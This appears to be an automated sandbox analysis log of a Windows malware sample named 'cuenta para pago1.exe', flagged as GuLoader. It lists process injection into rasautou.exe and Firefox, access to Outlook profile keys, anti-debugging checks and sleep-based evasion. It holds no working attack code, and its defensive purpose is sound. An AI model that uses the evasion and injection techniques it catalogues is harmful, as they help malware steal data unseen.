        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_00404579 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404579
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402095
        Source: C:\Users\user\Desktop\cuenta para pago1.exeFile created: C:\Users\user\Pictures\industrialisereJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeFile created: C:\Users\user\AppData\Local\Temp\nssDA2C.tmpJump to behavior
        Source: cuenta para pago1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\cuenta para pago1.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: cuenta para pago1.exeReversingLabs: Detection: 47%
        Source: C:\Users\user\Desktop\cuenta para pago1.exeFile read: C:\Users\user\Desktop\cuenta para pago1.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\cuenta para pago1.exe C:\Users\user\Desktop\cuenta para pago1.exe
        Source: C:\Users\user\Desktop\cuenta para pago1.exeProcess created: C:\Users\user\Desktop\cuenta para pago1.exe C:\Users\user\Desktop\cuenta para pago1.exe
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exeProcess created: C:\Windows\SysWOW64\rasautou.exe C:\Windows\SysWOW64\rasautou.exe
        Source: C:\Windows\SysWOW64\rasautou.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\cuenta para pago1.exeProcess created: C:\Users\user\Desktop\cuenta para pago1.exe C:\Users\user\Desktop\cuenta para pago1.exeJump to behavior
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exeProcess created: C:\Windows\SysWOW64\rasautou.exe C:\Windows\SysWOW64\rasautou.exeJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: cuenta para pago1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: wntdll.pdbUGP source: cuenta para pago1.exe, 00000002.00000003.4095218580.000000003453C000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4099312779.00000000346E3000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: cuenta para pago1.exe, cuenta para pago1.exe, 00000002.00000003.4095218580.000000003453C000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000003.4099312779.00000000346E3000.00000004.00000020.00020000.00000000.sdmp, cuenta para pago1.exe, 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: cuenta para pago1.exe, 00000002.00000001.3959353601.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: rasautou.pdbGCTL source: cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: rasautou.pdb source: cuenta para pago1.exe, 00000002.00000002.4199073124.00000000046A1000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000002.00000002.4188957643.0000000001794000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.4059690339.0000000004F84000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
        Source: C:\Users\user\Desktop\cuenta para pago1.exeFile created: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\cuenta para pago1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901763 rdtsc 2_2_34901763
        Source: C:\Windows\SysWOW64\rasautou.exeWindow / User API: threadDelayed 9838Jump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\cuenta para pago1.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\rasautou.exe TID: 4564Thread sleep count: 122 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exe TID: 4564Thread sleep time: -244000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exe TID: 9128Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exe TID: 4564Thread sleep count: 9838 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exe TID: 4564Thread sleep time: -19676000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe TID: 4644Thread sleep time: -100000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe TID: 4644Thread sleep time: -40500s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe TID: 4644Thread sleep count: 45 > 30Jump to behavior
        Source: C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe TID: 4644Thread sleep time: -45000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rasautou.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_0040635D FindFirstFileW,FindClose,0_2_0040635D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040580B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
        Source: cuenta para pago1.exe, 00000002.00000002.4198736310.0000000004628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
        Source: cuenta para pago1.exe, 00000002.00000003.4096502054.0000000004691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWE
        Source: cuenta para pago1.exe, 00000002.00000003.4096502054.0000000004691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\cuenta para pago1.exeAPI call chain: ExitProcess graph end nodegraph_0-4548
        Source: C:\Users\user\Desktop\cuenta para pago1.exeAPI call chain: ExitProcess graph end nodegraph_0-4551
        Source: C:\Windows\SysWOW64\rasautou.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\rasautou.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34901763 rdtsc 2_2_34901763
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_00405648 CreateDirectoryW,GetLastError,GetLastError,LdrInitializeThunk,SetFileSecurityW,GetLastError,0_2_00405648
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3494C490 mov eax, dword ptr fs:[00000030h]2_2_3494C490
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C0485 mov ecx, dword ptr fs:[00000030h]2_2_348C0485
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FB490 mov eax, dword ptr fs:[00000030h]2_2_348FB490
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FB490 mov eax, dword ptr fs:[00000030h]2_2_348FB490
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C24A2 mov eax, dword ptr fs:[00000030h]2_2_348C24A2
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C24A2 mov ecx, dword ptr fs:[00000030h]2_2_348C24A2
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FE4BC mov eax, dword ptr fs:[00000030h]2_2_348FE4BC
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3494D4A0 mov ecx, dword ptr fs:[00000030h]2_2_3494D4A0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3494D4A0 mov eax, dword ptr fs:[00000030h]2_2_3494D4A0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3494D4A0 mov eax, dword ptr fs:[00000030h]2_2_3494D4A0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E14C9 mov eax, dword ptr fs:[00000030h]2_2_348E14C9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E14C9 mov eax, dword ptr fs:[00000030h]2_2_348E14C9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E14C9 mov eax, dword ptr fs:[00000030h]2_2_348E14C9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E14C9 mov eax, dword ptr fs:[00000030h]2_2_348E14C9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E14C9 mov eax, dword ptr fs:[00000030h]2_2_348E14C9
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EF4D0 mov eax, dword ptr fs:[00000030h]2_2_348EF4D0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EF4D0 mov eax, dword ptr fs:[00000030h]2_2_348EF4D0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EF4D0 mov eax, dword ptr fs:[00000030h]2_2_348EF4D0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EF4D0 mov eax, dword ptr fs:[00000030h]2_2_348EF4D0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EF4D0 mov eax, dword ptr fs:[00000030h]2_2_348EF4D0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EF4D0 mov eax, dword ptr fs:[00000030h]2_2_348EF4D0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EF4D0 mov eax, dword ptr fs:[00000030h]2_2_348EF4D0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EF4D0 mov eax, dword ptr fs:[00000030h]2_2_348EF4D0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EF4D0 mov eax, dword ptr fs:[00000030h]2_2_348EF4D0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E44D1 mov eax, dword ptr fs:[00000030h]2_2_348E44D1
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E44D1 mov eax, dword ptr fs:[00000030h]2_2_348E44D1
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FE4EF mov eax, dword ptr fs:[00000030h]2_2_348FE4EF
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FE4EF mov eax, dword ptr fs:[00000030h]2_2_348FE4EF
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497F4FD mov eax, dword ptr fs:[00000030h]2_2_3497F4FD
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E94FA mov eax, dword ptr fs:[00000030h]2_2_348E94FA
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C64F0 mov eax, dword ptr fs:[00000030h]2_2_348C64F0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B640D mov eax, dword ptr fs:[00000030h]2_2_348B640D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497F409 mov eax, dword ptr fs:[00000030h]2_2_3497F409
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F7425 mov eax, dword ptr fs:[00000030h]2_2_348F7425
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F7425 mov ecx, dword ptr fs:[00000030h]2_2_348F7425
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB420 mov eax, dword ptr fs:[00000030h]2_2_348BB420
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3494F42F mov eax, dword ptr fs:[00000030h]2_2_3494F42F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3494F42F mov eax, dword ptr fs:[00000030h]2_2_3494F42F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3494F42F mov eax, dword ptr fs:[00000030h]2_2_3494F42F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3494F42F mov eax, dword ptr fs:[00000030h]2_2_3494F42F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3494F42F mov eax, dword ptr fs:[00000030h]2_2_3494F42F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0445 mov eax, dword ptr fs:[00000030h]2_2_348D0445
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0445 mov eax, dword ptr fs:[00000030h]2_2_348D0445
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0445 mov eax, dword ptr fs:[00000030h]2_2_348D0445
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0445 mov eax, dword ptr fs:[00000030h]2_2_348D0445
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0445 mov eax, dword ptr fs:[00000030h]2_2_348D0445
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D0445 mov eax, dword ptr fs:[00000030h]2_2_348D0445
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EE45E mov eax, dword ptr fs:[00000030h]2_2_348EE45E
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EE45E mov eax, dword ptr fs:[00000030h]2_2_348EE45E
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EE45E mov eax, dword ptr fs:[00000030h]2_2_348EE45E
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EE45E mov eax, dword ptr fs:[00000030h]2_2_348EE45E
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EE45E mov eax, dword ptr fs:[00000030h]2_2_348EE45E
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CD454 mov eax, dword ptr fs:[00000030h]2_2_348CD454
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CD454 mov eax, dword ptr fs:[00000030h]2_2_348CD454
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CD454 mov eax, dword ptr fs:[00000030h]2_2_348CD454
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CD454 mov eax, dword ptr fs:[00000030h]2_2_348CD454
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CD454 mov eax, dword ptr fs:[00000030h]2_2_348CD454
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CD454 mov eax, dword ptr fs:[00000030h]2_2_348CD454
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497F478 mov eax, dword ptr fs:[00000030h]2_2_3497F478
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C8470 mov eax, dword ptr fs:[00000030h]2_2_348C8470
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C8470 mov eax, dword ptr fs:[00000030h]2_2_348C8470
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3498A464 mov eax, dword ptr fs:[00000030h]2_2_3498A464
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3497F582 mov eax, dword ptr fs:[00000030h]2_2_3497F582
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F2594 mov eax, dword ptr fs:[00000030h]2_2_348F2594
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E588 mov eax, dword ptr fs:[00000030h]2_2_3493E588
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3493E588 mov eax, dword ptr fs:[00000030h]2_2_3493E588
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C45B0 mov eax, dword ptr fs:[00000030h]2_2_348C45B0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C45B0 mov eax, dword ptr fs:[00000030h]2_2_348C45B0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_349485AA mov eax, dword ptr fs:[00000030h]2_2_349485AA
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF5C7 mov eax, dword ptr fs:[00000030h]2_2_348BF5C7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF5C7 mov eax, dword ptr fs:[00000030h]2_2_348BF5C7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF5C7 mov eax, dword ptr fs:[00000030h]2_2_348BF5C7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF5C7 mov eax, dword ptr fs:[00000030h]2_2_348BF5C7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF5C7 mov eax, dword ptr fs:[00000030h]2_2_348BF5C7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF5C7 mov eax, dword ptr fs:[00000030h]2_2_348BF5C7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF5C7 mov eax, dword ptr fs:[00000030h]2_2_348BF5C7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF5C7 mov eax, dword ptr fs:[00000030h]2_2_348BF5C7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BF5C7 mov eax, dword ptr fs:[00000030h]2_2_348BF5C7
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348F65D0 mov eax, dword ptr fs:[00000030h]2_2_348F65D0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3494C5FC mov eax, dword ptr fs:[00000030h]2_2_3494C5FC
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CB5E0 mov eax, dword ptr fs:[00000030h]2_2_348CB5E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CB5E0 mov eax, dword ptr fs:[00000030h]2_2_348CB5E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CB5E0 mov eax, dword ptr fs:[00000030h]2_2_348CB5E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CB5E0 mov eax, dword ptr fs:[00000030h]2_2_348CB5E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CB5E0 mov eax, dword ptr fs:[00000030h]2_2_348CB5E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348CB5E0 mov eax, dword ptr fs:[00000030h]2_2_348CB5E0
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FC50D mov eax, dword ptr fs:[00000030h]2_2_348FC50D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348FC50D mov eax, dword ptr fs:[00000030h]2_2_348FC50D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3494C51D mov eax, dword ptr fs:[00000030h]2_2_3494C51D
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EE507 mov eax, dword ptr fs:[00000030h]2_2_348EE507
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EE507 mov eax, dword ptr fs:[00000030h]2_2_348EE507
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EE507 mov eax, dword ptr fs:[00000030h]2_2_348EE507
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EE507 mov eax, dword ptr fs:[00000030h]2_2_348EE507
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EE507 mov eax, dword ptr fs:[00000030h]2_2_348EE507
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EE507 mov eax, dword ptr fs:[00000030h]2_2_348EE507
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EE507 mov eax, dword ptr fs:[00000030h]2_2_348EE507
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348EE507 mov eax, dword ptr fs:[00000030h]2_2_348EE507
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348BB502 mov eax, dword ptr fs:[00000030h]2_2_348BB502
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C2500 mov eax, dword ptr fs:[00000030h]2_2_348C2500
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F51B mov eax, dword ptr fs:[00000030h]2_2_3496F51B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F51B mov eax, dword ptr fs:[00000030h]2_2_3496F51B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F51B mov eax, dword ptr fs:[00000030h]2_2_3496F51B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F51B mov eax, dword ptr fs:[00000030h]2_2_3496F51B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F51B mov eax, dword ptr fs:[00000030h]2_2_3496F51B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F51B mov eax, dword ptr fs:[00000030h]2_2_3496F51B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F51B mov ecx, dword ptr fs:[00000030h]2_2_3496F51B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F51B mov ecx, dword ptr fs:[00000030h]2_2_3496F51B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F51B mov eax, dword ptr fs:[00000030h]2_2_3496F51B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F51B mov eax, dword ptr fs:[00000030h]2_2_3496F51B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F51B mov eax, dword ptr fs:[00000030h]2_2_3496F51B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F51B mov eax, dword ptr fs:[00000030h]2_2_3496F51B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3496F51B mov eax, dword ptr fs:[00000030h]2_2_3496F51B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E1514 mov eax, dword ptr fs:[00000030h]2_2_348E1514
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E1514 mov eax, dword ptr fs:[00000030h]2_2_348E1514
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E1514 mov eax, dword ptr fs:[00000030h]2_2_348E1514
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E1514 mov eax, dword ptr fs:[00000030h]2_2_348E1514
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E1514 mov eax, dword ptr fs:[00000030h]2_2_348E1514
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348E1514 mov eax, dword ptr fs:[00000030h]2_2_348E1514
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D252B mov eax, dword ptr fs:[00000030h]2_2_348D252B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D252B mov eax, dword ptr fs:[00000030h]2_2_348D252B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D252B mov eax, dword ptr fs:[00000030h]2_2_348D252B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D252B mov eax, dword ptr fs:[00000030h]2_2_348D252B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D252B mov eax, dword ptr fs:[00000030h]2_2_348D252B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D252B mov eax, dword ptr fs:[00000030h]2_2_348D252B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348D252B mov eax, dword ptr fs:[00000030h]2_2_348D252B
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_34902539 mov eax, dword ptr fs:[00000030h]2_2_34902539
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B753F mov eax, dword ptr fs:[00000030h]2_2_348B753F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B753F mov eax, dword ptr fs:[00000030h]2_2_348B753F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348B753F mov eax, dword ptr fs:[00000030h]2_2_348B753F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C3536 mov eax, dword ptr fs:[00000030h]2_2_348C3536
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C3536 mov eax, dword ptr fs:[00000030h]2_2_348C3536
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_348C254C mov eax, dword ptr fs:[00000030h]2_2_348C254C
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3499B55F mov eax, dword ptr fs:[00000030h]2_2_3499B55F
        Source: C:\Users\user\Desktop\cuenta para pago1.exeCode function: 2_2_3499B55F mov eax, dword ptr fs:[00000030h]2_2_3499B55F
